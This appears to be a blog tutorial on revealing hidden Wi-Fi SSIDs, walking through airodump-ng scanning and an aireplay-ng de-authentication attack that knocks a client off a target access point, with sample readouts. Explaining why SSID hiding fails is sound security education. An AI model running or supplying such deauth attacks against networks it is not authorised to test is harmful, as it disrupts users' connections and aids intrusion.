Find Hidden SSID's
Known as security though obscurity many people may hide there ssid's from broadcasting. Just like mac address blocking this is a worthless form of protection. There is nothing secure about hiding your SSID. Its like the wizard hiding behind the curtain. It just does not add any value to your security and like mac address blocking it adds complication with no reward. Today I am going to show you how easy it is to reveal a hidden SSID using the aircrack-ng suite. First things first. Start airdump-ng by using the following command. Replace the interface with your own.
| airodump-ng wlan1 |
The readout should be something like this.
CH 9 ][ BAT: 3 hours 9 mins ][ Elapsed: 8 s ][ 2012-05-20 11:09 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 28:EF:01:34:64:91 -29 19 1 0 6 54e WPA2 CCMP PSK linksys 28:EF:01:35:34:85 -42 17 0 0 6 54e WPA2 CCMP PSK <length: 6> BSSID STATION PWR Rate Lost Packets Probes 28:EF:01:35:34:85 28:EF:01:23:45:67 -57 0 - 1 0 1 |
As you can see from the devices found we have one with a hidden SSID. This hidden SSID is depicted as <length: x>
| airodump-ng -c 6 --bssid 28:EF:01:35:34:85 wlan1 |
explanation of the switches are
-c = channel of target access point
--bssid = MAC address from the target access point
This is what the airdump-ng readout should look like now.
CH 6 ][ BAT: 3 hours 9 mins ][ Elapsed: 8 s ][ 2012-05-20 11:09 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 28:EF:01:35:34:85 -42 17 0 0 6 54e WPA2 CCMP PSK <length: 6> BSSID STATION PWR Rate Lost Packets Probes 28:EF:01:35:34:85 28:EF:01:23:45:67 -57 0 - 1 0 1 |
Here we can see the target access point with one client attached. We now need to de-authenticate this client and see if we can get the SSID during the re authentication.
Now open a new terminal window and leave airodump-ng running.
Run this command in the new terminal.
aireplay-ng -0 30 -a 28:EF:01:35:34:85 -c 28:EF:01:23:45:67 wlan1 |
This switches to this command are as follows
-0 = Attack mode 0= de-authentication (The number following this indicates the number of deauth packets.)
-a = Target access point mac address
-c = Target client mac address
Now switch back to the original terminal window that still has airodump-ng running.
This is what it should now look like.
CH 6 ][ BAT: 3 hours 9 mins ][ Elapsed: 8 s ][ 2012-05-20 11:09 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 28:EF:01:35:34:85 -42 17 0 0 6 54e WPA2 CCMP PSK hacked BSSID STATION PWR Rate Lost Packets Probes 28:EF:01:35:34:85 28:EF:01:23:45:67 -57 0 - 1 0 1 hacked |
As you can see we now know that the SSID for the target router is "hacked"
If it does not work the first time try aireplay-ng again until it works.
Stay informed!
Previous issues
